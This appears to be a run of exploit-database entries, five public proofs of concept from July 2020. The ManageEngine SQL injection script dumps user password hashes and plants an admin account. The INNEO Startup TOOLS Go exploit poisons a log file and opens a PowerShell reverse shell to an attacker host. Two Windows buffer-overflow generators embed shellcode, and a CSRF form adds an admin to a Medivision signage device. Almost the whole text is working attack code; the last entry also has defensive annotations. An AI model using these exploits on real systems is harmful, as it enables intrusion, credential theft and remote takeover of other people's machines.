  21. # Exploit Title: ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection # Google Dork: intitle:"Applications Manager Login Screen" # Date: 2020-07-23 # Exploit Author: aldorm # Vendor Homepage: https://www.manageengine.com/ # Software Link: # Version: 12 and 13 before Build 13200 # Tested on: Windows # CVE : 2016-9488 #!/usr/bin/env python2 # App: ManageEngine Applications Manager # Versions: 12 and 13 before build 13200 # CVE: CVE-2016-9488 # Vuln Type: SQL Injection # CVSSv3: 9.8 # # PoC Autor: aldorm # Release date: 23-07-2020 # ./poc_CVE-2016-9488.py 192.168.123.113 8443 --create-user-hacker # [*] Extracting all users: # admin:21232f297a57a5a743894a0e4a801fc3 # reportadmin:21232f297a57a5a743894a0e4a801fc3 # systemadmin_enterprise:21232f297a57a5a743894a0e4a801fc3 # [*] Creating new user: # User: hacker # Password: admin # [*] Verifing created user... # Success. import sys import requests import urllib3 import json urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) target = 'localhost' def get_userpassword(): sqli = ' UNION ALL SELECT userid,CONCAT(username,$$:$$,password),NULL FROM am_userpasswordtable--' r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False); j = json.loads(r.text) return j def create_user(): sqli = '; INSERT INTO am_userpasswordtable VALUES (123123123, $$hacker$$,$$21232f297a57a5a743894a0e4a801fc3$$,NULL,NULL,$$21232f297a57a5a743894a0e4a801fc3$$,1); -- ' r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False); sqli = ';INSERT INTO amdb.public.am_usergrouptable VALUES ($$hacker$$,$$USERS$$); -- ' r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False); sqli = ';INSERT INTO amdb.public.am_usergrouptable VALUES 
($$hacker$$,$$ADMIN$$); -- ' r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False); return def main (): if not len(sys.argv) > 2: print "Usage %s <target> <port> [--create-user-hacker]" % sys.argv[0] print "e.g. %s manageengine 8443 " % sys.argv[0] sys.exit(1) global target global port target=sys.argv[1] port=sys.argv[2] print "[*] Extracting all users:" j = get_userpassword() for user in j["0"]: print "\t %s" % user[1] if len(sys.argv) == 4 and sys.argv[3] == '--create-user-hacker': print "[*] Creating new user: \n\tUser: hacker \n\tPassword: admin" create_user() print "[*] Verifing created user..." j = get_userpassword() for user in j["0"]: if user[1] == "hacker:21232f297a57a5a743894a0e4a801fc3": print "Success." return print "User not created." if __name__ == '__main__': main()
  22. # Exploit Title: INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution # Date: 2020-07-23 # Exploit Author: Patrick Hener, SySS GmbH # Many credits go to Dr. Benjamin Heß, SySS GmbH for helping with php oddities and the powershell payload # Advisory: SYSS-2020-028 (https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-028.txt) # Vendor Homepage: https://www.inneo.co.uk/en/home.html # Version: Startup TOOLS 2017/2018 # Tested on: Windows 10 x64 # CVE : CVE-2020-15492 /* This exploit was written by Patrick Hener, SySS GmbH */ package main import ( "encoding/base64" "fmt" _ "fmt" "io" "io/ioutil" "log" "net" "net/http" "net/url" "os" "regexp" "strconv" "strings" "golang.org/x/text/encoding/unicode" ) type progress struct { bytes uint64 } func usage() { fmt.Printf("Usage: %s lhost[192.168.x.x] lport[4444] url[http://ip:85] installDir[PROGRA~2/stools] \n\n", os.Args[0]) os.Exit(2) } func readFile(target string, traversal string, path string) (bool, string) { success := true request := fmt.Sprintf("%s%s%s", target, traversal, path) resp, err := http.Get(request) if err != nil { fmt.Println(err) } if resp.Status != "200 OK" { success = false } defer resp.Body.Close() body, err := ioutil.ReadAll(resp.Body) if err != nil { fmt.Println(err) } return success, string(body) } func triggerFile(target string, traversal string, path string) { request := fmt.Sprintf("%s%s%s", target, traversal, path) _, _ = http.Get(request) } func poison(target string, traversal string, path string) (bool, string) { success := true request := fmt.Sprintf("%s%s%s", target, traversal, path) resp, err := http.Get(request) if err != nil { fmt.Println(err) os.Exit(2) } if resp.Status != "404 Not Found" { success = false } defer resp.Body.Close() fmt.Printf("[*] Poisoned: %s\n", path) body, err := ioutil.ReadAll(resp.Body) if err != nil { fmt.Println(err) } return success, string(body) } func parseHostname(body string) string { re := regexp.MustCompile("Service 
hostname:?.*") hostnameRaw := re.FindAllString(body, -1) hostnameSplit := strings.Split(hostnameRaw[0], ":") hostnameTrimmed := strings.TrimSpace(hostnameSplit[1]) hostnameNoNewline := strings.Replace(hostnameTrimmed, "\n", "", -1) return hostnameNoNewline } func customEscape(sequence string) string { output := url.PathEscape(sequence) output = strings.Replace(output, "+", "%20", -1) output = strings.Replace(output, "=", "%3D", -1) return output } func payloadEscape(sequence string) string { output := url.PathEscape(sequence) output = strings.Replace(output, "=", "%3D", -1) return output } func transferStreams(con net.Conn) { c := make(chan progress) // Read from Reader and write to Writer until EOF copy := func(r io.ReadCloser, w io.WriteCloser) { defer func() { r.Close() w.Close() }() n, err := io.Copy(w, r) if err != nil { fmt.Printf("[%s]: ERROR: %s\n", con.RemoteAddr(), err) } c <- progress{bytes: uint64(n)} } go copy(con, os.Stdout) go copy(os.Stdin, con) p := <-c fmt.Printf("[*] [%s]: Connection has been closed by remote peer, %d bytes has been received\n", con.RemoteAddr(), p.bytes) p = <-c fmt.Printf("[*] [%s]: Local peer has been stopped, %d bytes has been sent\n", con.RemoteAddr(), p.bytes) } func startServer(addr string) { ln, err := net.Listen("tcp", addr) if err != nil { log.Fatalln(err) } fmt.Printf("[+] Now listening on %s\n", addr) con, err := ln.Accept() if err != nil { log.Fatalln(err) } fmt.Printf("[+] [%s]: Connection has been opened. Press 'RETURN' once to start. 
Enjoy your shell, good sir.\n", con.RemoteAddr()) transferStreams(con) } func stage1(target string, traversal string, installDir string) string { fmt.Printf("[*] Attacking target %s with assumed install path %s\n", target, installDir) fmt.Printf("[*] Trying to read 'sut_server.log' to receive hostname of target at %s%s%s/software/LOG/sut_server.log\n", target, traversal, installDir) path := fmt.Sprintf("%s/software/LOG/sut_server.log", installDir) success, response := readFile(target, traversal, path) if !success { fmt.Printf("[-] It looks like %s%s%s is not there. Provide install_dir to try via args.\n", target, traversal, installDir) os.Exit(2) } hostname := parseHostname(response) return hostname } func stage2(target string, traversal string, installDir string, payloadFinal string) { /* Stage 2 - poison log with php payload Special about that is the length of payload junk has max restriction of about 200 characters Thus we are splitting up the payload escaping the trash we don't need like the 'n' is nesessary to escape DRIVE:\ which will be DRIVE:\n then <?php $cmd=''; $foo= ' n'; $cmd.="part1"; $foo=' n'; $cmd.="part2"; $foo=' .... n'; system(cmd); ?> */ fmt.Println("[*] Poisoning Log with payload") /* Start of the php code */ start := customEscape("<?php $cmd=''; $foo='") success, _ := poison(target, traversal, start) if !success { fmt.Println("Poisoning failed. Exiting") os.Exit(2) } /* Looping through payload */ offset := 0 pre := "n'; $cmd.='" post := "'; $foo='" for offset < len(payloadFinal) { payload := payloadFinal[offset : offset+150-len(pre)-len(post)] poisonPath := payloadEscape(fmt.Sprintf("%s%s%s", pre, payload, post)) success, _ = poison(target, traversal, poisonPath) if !success { fmt.Println("Poisoning failed. 
Exiting") os.Exit(2) } offset += 150 - len(pre) - len(post) if len(payloadFinal)-offset <= 150-len(pre)-len(post) { break } } /* Send last slice of payload to prevent from out of range error */ payload := payloadFinal[offset:len(payloadFinal)] poisonPath := payloadEscape(fmt.Sprintf("%s%s%s", pre, payload, post)) success, _ = poison(target, traversal, poisonPath) if !success { fmt.Println("Poisoning failed. Exiting") os.Exit(2) } /* End of the php code */ end := customEscape("n'; system($cmd); die; ?>") success, _ = poison(target, traversal, end) if !success { fmt.Println("Poisoning failed. Exiting") os.Exit(2) } } func stage3(target string, traversal string, installDir string, hostname string) { logFile := fmt.Sprintf("%s%s%s/software/LOG/sut_server_%s.log\\0.php", target, traversal, installDir, hostname) fmt.Printf("[*] Triggering inclusion of %s\n", logFile) triggerFile(target, traversal, logFile) } func stage4(lhost string, lport int) { /* Listen for socket connection */ addr := fmt.Sprintf("%s:%d", lhost, lport) fmt.Printf("[*] Starting reverse listener at %s\n", addr) startServer(addr) } func main() { if len(os.Args) < 4 { usage() } lhost := os.Args[1] lport, err := strconv.Atoi(os.Args[2]) if err != nil { fmt.Println("lport has to be numeric") os.Exit(2) } target := os.Args[3] var installDir string if len(os.Args) == 4 { installDir = "PROGRA~2/stools" } else { installDir = os.Args[4] } /* Payload definition */ payload := fmt.Sprintf("$client = New-Object System.Net.Sockets.TCPClient('%s',%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()", lhost, lport) /* Convert to base64 
UTF-16LE */ encoder := unicode.UTF16(unicode.LittleEndian, unicode.IgnoreBOM).NewEncoder() payloadEncoded, _ := encoder.String(payload) payloadEncodedString := base64.StdEncoding.EncodeToString([]byte(payloadEncoded)) /* In webshell we would issue: powershell.exe -exec bypass -EncodedCommand <encoded_payload> */ payloadFinal := fmt.Sprintf("powershell.exe -exec bypass -EncodedCommand %s", payloadEncodedString) /* Traversal to root - default depth would be 4 */ traversal := "/../../../../../../../../../../" /* stage 1 - get hostname */ hostname := stage1(target, traversal, installDir) fmt.Printf("[+] Hostname of target is: %s\n", hostname) /* stage 2 - poisoning */ stage2(target, traversal, installDir, payloadFinal) /* stage 3 - trigger */ go stage3(target, traversal, installDir, hostname) /* stage4 - start listener */ stage4(lhost, lport) }
  23. # Exploit Title: Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH) # Exploit Author: Sarang Tumne # Date: 2020-07-18 # CVE ID: N/A # Confirmed on release 4.8.0 and 4.5.0 # Vendor: http://www.port-forwarding.net/ # Tested on OS- Windows Vista # Buffer overflow in upRedSun Port Forwarding Wizard 4.8.0 and earlier version allows local # attackers to execute arbitrary code via a long request in the Register feature. ############################################### #!/usr/bin/python file=open("payload.txt","w+b") buffer="\x90"*164 buffer+="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x73\x61\x72\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # EggHunter buffer+="\x90"*20 shellcode="sarasara" #Egg tag- sarasara shellcode+="\x90"*40 shellcode+=("\xdd\xc7\xd9\x74\x24\xf4\x58\x50\x59\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41" "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x6b" "\x4c\x6d\x38\x6c\x42\x53\x30\x57\x70\x33\x30\x51\x70\x6e\x69" "\x78\x65\x36\x51\x6f\x30\x35\x34\x4e\x6b\x52\x70\x54\x70\x4e" "\x6b\x46\x32\x76\x6c\x6c\x4b\x70\x52\x62\x34\x6e\x6b\x33\x42" "\x54\x68\x66\x6f\x4e\x57\x71\x5a\x34\x66\x70\x31\x49\x6f\x4e" "\x4c\x57\x4c\x65\x31\x61\x6c\x37\x72\x54\x6c\x55\x70\x59\x51" "\x48\x4f\x44\x4d\x43\x31\x4a\x67\x49\x72\x5a\x52\x33\x62\x70" "\x57\x4c\x4b\x50\x52\x56\x70\x6c\x4b\x73\x7a\x35\x6c\x4c\x4b" "\x50\x4c\x42\x31\x70\x78\x49\x73\x53\x78\x46\x61\x4a\x71\x52" "\x71\x4e\x6b\x30\x59\x71\x30\x55\x51\x4a\x73\x4e\x6b\x71\x59" "\x36\x78\x78\x63\x35\x6a\x37\x39\x6c\x4b\x77\x44\x6e\x6b\x76" "\x61\x39\x46\x76\x51\x59\x6f\x6e\x4c\x4a\x61\x78\x4f\x54\x4d" "\x77\x71\x5a\x67\x36\x58\x79\x70\x54\x35\x69\x66\x74\x43\x51" "\x6d\x58\x78\x55\x6b\x43\x4d\x46\x44\x70\x75\x5a\x44\x50\x58" "\x4e\x6b\x62\x78\x65\x74\x73\x31\x6b\x63\x42\x46\x6c\x4b\x36" "\x6c\x50\x4b\x4e\x6b\x42\x78\x65\x4c\x33\x31\x69\x43\x4c\x4b" 
"\x47\x74\x4e\x6b\x77\x71\x78\x50\x4c\x49\x50\x44\x76\x44\x66" "\x44\x43\x6b\x61\x4b\x31\x71\x51\x49\x63\x6a\x43\x61\x39\x6f" "\x49\x70\x61\x4f\x73\x6f\x53\x6a\x4e\x6b\x37\x62\x68\x6b\x6c" "\x4d\x63\x6d\x45\x38\x56\x53\x30\x32\x47\x70\x47\x70\x55\x38" "\x62\x57\x74\x33\x67\x42\x31\x4f\x61\x44\x33\x58\x50\x4c\x31" "\x67\x35\x76\x64\x47\x39\x6f\x6b\x65\x6f\x48\x6a\x30\x37\x71" "\x73\x30\x67\x70\x57\x59\x48\x44\x30\x54\x66\x30\x75\x38\x67" "\x59\x6d\x50\x32\x4b\x35\x50\x4b\x4f\x6a\x75\x76\x30\x30\x50" "\x50\x50\x36\x30\x37\x30\x36\x30\x43\x70\x52\x70\x31\x78\x78" "\x6a\x56\x6f\x49\x4f\x69\x70\x4b\x4f\x39\x45\x5a\x37\x31\x7a" "\x44\x45\x61\x78\x49\x50\x39\x38\x56\x58\x30\x6c\x73\x58\x55" "\x52\x73\x30\x56\x71\x43\x6c\x4c\x49\x4b\x56\x30\x6a\x56\x70" "\x43\x66\x70\x57\x31\x78\x5a\x39\x49\x35\x62\x54\x50\x61\x39" "\x6f\x7a\x75\x4f\x75\x6f\x30\x73\x44\x46\x6c\x4b\x4f\x70\x4e" "\x76\x68\x61\x65\x5a\x4c\x53\x58\x68\x70\x4f\x45\x79\x32\x46" "\x36\x59\x6f\x4a\x75\x63\x58\x32\x43\x52\x4d\x61\x74\x57\x70" "\x6b\x39\x4a\x43\x63\x67\x76\x37\x63\x67\x64\x71\x69\x66\x62" "\x4a\x46\x72\x73\x69\x61\x46\x6a\x42\x6b\x4d\x63\x56\x4a\x67" "\x71\x54\x71\x34\x67\x4c\x47\x71\x46\x61\x6c\x4d\x53\x74\x37" "\x54\x46\x70\x38\x46\x63\x30\x37\x34\x70\x54\x50\x50\x36\x36" "\x61\x46\x52\x76\x53\x76\x53\x66\x50\x4e\x46\x36\x33\x66\x36" "\x33\x42\x76\x52\x48\x70\x79\x68\x4c\x37\x4f\x4f\x76\x59\x6f" "\x38\x55\x4f\x79\x6b\x50\x70\x4e\x32\x76\x77\x36\x49\x6f\x46" "\x50\x55\x38\x44\x48\x6d\x57\x47\x6d\x61\x70\x59\x6f\x6e\x35" "\x4d\x6b\x4b\x4e\x74\x4e\x64\x72\x39\x7a\x72\x48\x4e\x46\x6c" "\x55\x6f\x4d\x6d\x4d\x59\x6f\x48\x55\x65\x6c\x66\x66\x71\x6c" "\x37\x7a\x6f\x70\x79\x6b\x6d\x30\x54\x35\x66\x65\x6f\x4b\x47" "\x37\x46\x73\x53\x42\x72\x4f\x72\x4a\x55\x50\x66\x33\x49\x6f" "\x39\x45\x41\x41") buffer+="\xeb\xb6\x90\x90" #Backward short jump- nseh buffer+="\x6d\x57\x37\x7c" #PPR- SEH buffer+="A"*200 file.write(buffer+shellcode) file.close()
  24. # Title: UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin) # Date: 2020-07-23 # Author: LiquidWorm # Product web page: http://www.medivision.co.kr # CVE: N/A <!-- UBICOD Medivision Digital Signage 1.5.1 CSRF Add Super Admin Vendor: UBICOD Co., Ltd. | MEDIVISION INC. Product web page: http://www.medivision.co.kr Affected version: Firmware 1.5.1 (2013.01.3) Summary: Medivision is a service that provides everything from DID operation to development of DID (Digital Information Display) optimized for hospital environment and production of professional contents, through DID product installation, image, video content planning, design work, and remote control. This is a one-stop solution that solves management at once. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. 
Tested on: Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.22 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5574 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5574.php 19.06.2020 --> <html> <body> <form action="http://10.0.39.2/query/user/itSet" method="POST"> <input type="hidden" name="aa[_id]" value="" /> <input type="hidden" name="aa[uid]" value="testingus2" /> <input type="hidden" name="aa[name]" value="TestN" /> <input type="hidden" name="aa[pass]" value="123456" /> <input type="hidden" name="aa[email]" value="[email protected]" /> <input type="hidden" name="aa[mobile]" value="111-222-3333" /> <input type="hidden" name="aa[phone]" value="333-222-1111" /> <input type="hidden" name="aa[approval]" value="+" /> <input type="hidden" name="aa[grp]" value="3" /> <input type="hidden" name="od[]" value="name" /> <input type="hidden" name="ip" value="0" /> <input type="hidden" name="np" value="13" /> <input type="submit" value="Submit request" /> </form> </body> </html>
  25. # Exploit Title: Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter)
# Date: 2020-07-22
# Exploit Author: Eduard Palisek
# Vendor Homepage: https://www.cleanersoft.com
# Software Link: https://www.cleanersoft.com/download/FMCRSetup.exe
# Version: 2.8 Build 20140611
# Tested on: [Windows XP, Professional, Version 2002, SP 3
#!/usr/bin/python

# Writes a crafted .wav file whose contents overflow a stack buffer in the
# target's file parser. Everything below only assembles bytes and writes them;
# nothing is executed by this script itself.
#
# NOTE(review): `file` shadows the Python 2 builtin of the same name, and the
# handle is closed by hand at the bottom instead of with a `with` block.
file = open("exploit.wav", "wb")

# msfvenom -p windows/shell_bind_tcp LPORT=9001 -a x86 EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d\" -f python -v shellcode_bind
#
# Payload as described by the generator line above: an encoded x86 bind-shell
# listening on TCP 9001. From a defender's view that listener (an unexpected
# inbound TCP port opened by the ripper process) is the most reliable
# post-exploitation indicator; the encoder only hides the bytes 00/0a/0d from
# the file parser, not the network behaviour.
shellcode_bind = b""
shellcode_bind += b"\xb8\x88\xbf\xa2\x65\xdb\xd6\xd9\x74\x24"
shellcode_bind += b"\xf4\x5a\x2b\xc9\xb1\x53\x83\xc2\x04\x31"
shellcode_bind += b"\x42\x0e\x03\xca\xb1\x40\x90\x36\x25\x06"
shellcode_bind += b"\x5b\xc6\xb6\x67\xd5\x23\x87\xa7\x81\x20"
shellcode_bind += b"\xb8\x17\xc1\x64\x35\xd3\x87\x9c\xce\x91"
shellcode_bind += b"\x0f\x93\x67\x1f\x76\x9a\x78\x0c\x4a\xbd"
shellcode_bind += b"\xfa\x4f\x9f\x1d\xc2\x9f\xd2\x5c\x03\xfd"
shellcode_bind += b"\x1f\x0c\xdc\x89\xb2\xa0\x69\xc7\x0e\x4b"
shellcode_bind += b"\x21\xc9\x16\xa8\xf2\xe8\x37\x7f\x88\xb2"
shellcode_bind += b"\x97\x7e\x5d\xcf\x91\x98\x82\xea\x68\x13"
shellcode_bind += b"\x70\x80\x6a\xf5\x48\x69\xc0\x38\x65\x98"
shellcode_bind += b"\x18\x7d\x42\x43\x6f\x77\xb0\xfe\x68\x4c"
shellcode_bind += b"\xca\x24\xfc\x56\x6c\xae\xa6\xb2\x8c\x63"
shellcode_bind += b"\x30\x31\x82\xc8\x36\x1d\x87\xcf\x9b\x16"
shellcode_bind += b"\xb3\x44\x1a\xf8\x35\x1e\x39\xdc\x1e\xc4"
shellcode_bind += b"\x20\x45\xfb\xab\x5d\x95\xa4\x14\xf8\xde"
shellcode_bind += b"\x49\x40\x71\xbd\x05\xa5\xb8\x3d\xd6\xa1"
shellcode_bind += b"\xcb\x4e\xe4\x6e\x60\xd8\x44\xe6\xae\x1f"
shellcode_bind += b"\xaa\xdd\x17\x8f\x55\xde\x67\x86\x91\x8a"
shellcode_bind += b"\x37\xb0\x30\xb3\xd3\x40\xbc\x66\x49\x48"
shellcode_bind += b"\x1b\xd9\x6c\xb5\xdb\x89\x30\x15\xb4\xc3"
shellcode_bind += b"\xbe\x4a\xa4\xeb\x14\xe3\x4d\x16\x97\x28"
shellcode_bind += b"\xa7\x9f\x71\x44\xa7\xc9\x2a\xf0\x05\x2e"
shellcode_bind += b"\xe3\x67\x75\x04\x5b\x0f\x3e\x4e\x5c\x30"
shellcode_bind += b"\xbf\x44\xca\xa6\x34\x8b\xce\xd7\x4a\x86"
shellcode_bind += b"\x66\x80\xdd\x5c\xe7\xe3\x7c\x60\x22\x93"
shellcode_bind += b"\x1d\xf3\xa9\x63\x6b\xe8\x65\x34\x3c\xde"
shellcode_bind += b"\x7f\xd0\xd0\x79\xd6\xc6\x28\x1f\x11\x42"
shellcode_bind += b"\xf7\xdc\x9c\x4b\x7a\x58\xbb\x5b\x42\x61"
shellcode_bind += b"\x87\x0f\x1a\x34\x51\xf9\xdc\xee\x13\x53"
shellcode_bind += b"\xb7\x5d\xfa\x33\x4e\xae\x3d\x45\x4f\xfb"
shellcode_bind += b"\xcb\xa9\xfe\x52\x8a\xd6\xcf\x32\x1a\xaf"
shellcode_bind += b"\x2d\xa3\xe5\x7a\xf6\xc3\x07\xae\x03\x6c"
shellcode_bind += b"\x9e\x3b\xae\xf1\x21\x96\xed\x0f\xa2\x12"
shellcode_bind += b"\x8e\xeb\xba\x57\x8b\xb0\x7c\x84\xe1\xa9"
shellcode_bind += b"\xe8\xaa\x56\xc9\x38"

# Egghunter: a small stub that scans memory for the 8-byte marker defined as
# `tag` below and transfers control to what follows it. The four bytes
# \x57\x30\x30\x54 embedded in it are the ASCII "W00T" half of that marker.
# The marker itself ("W00TW00T"), the 30-byte 0x90 sled and the long runs of
# 'A'/'B' are trivial static signatures for a file scanner or YARA rule.
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x57\x30\x30\x54\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

nops = "\x90" * 30
# 2112 bytes of filler precede the marker; this is the distance from the start
# of the file content to where the author places the egg.
junk1 = "A" * 2112
tag = "W00TW00T"
# Pad so that tag + nops + shellcode + junk2 is exactly 2000 bytes, i.e. the
# overwritten slot sits at a fixed offset of 2112 + 2000 into the file.
# NOTE(review): shellcode_bind is a bytes literal while nops/tag are str; the
# concatenation inside len() and in `buffer` below relies on those being the
# same type, as they are on Python 2.
junk2 = "B" * (2000-len(shellcode_bind+nops+tag))
# Hard-coded, non-relocated address in user32.dll on the XP SP3 build named in
# the header. It is specific to that module version, which is why ASLR (or a
# different patch level) defeats this layout, and DEP blocks the stack-resident
# payload regardless.
# NOTE(review): the variable is named `eip` and the comment describes a
# `jmp esp` gadget, whereas the title says SEH - which control structure this
# slot actually overwrites cannot be determined from the script alone.
eip = "\x53\x93\x42\x7e" # 0x7e429353 : jmp esp in user32.dll

# Final file layout, front to back:
#   junk1 | tag | nops | shellcode_bind | junk2 | eip | nops | egghunter
buffer = junk1 + tag + nops + shellcode_bind + junk2 + eip + nops + egghunter
file.write(buffer)
file.close()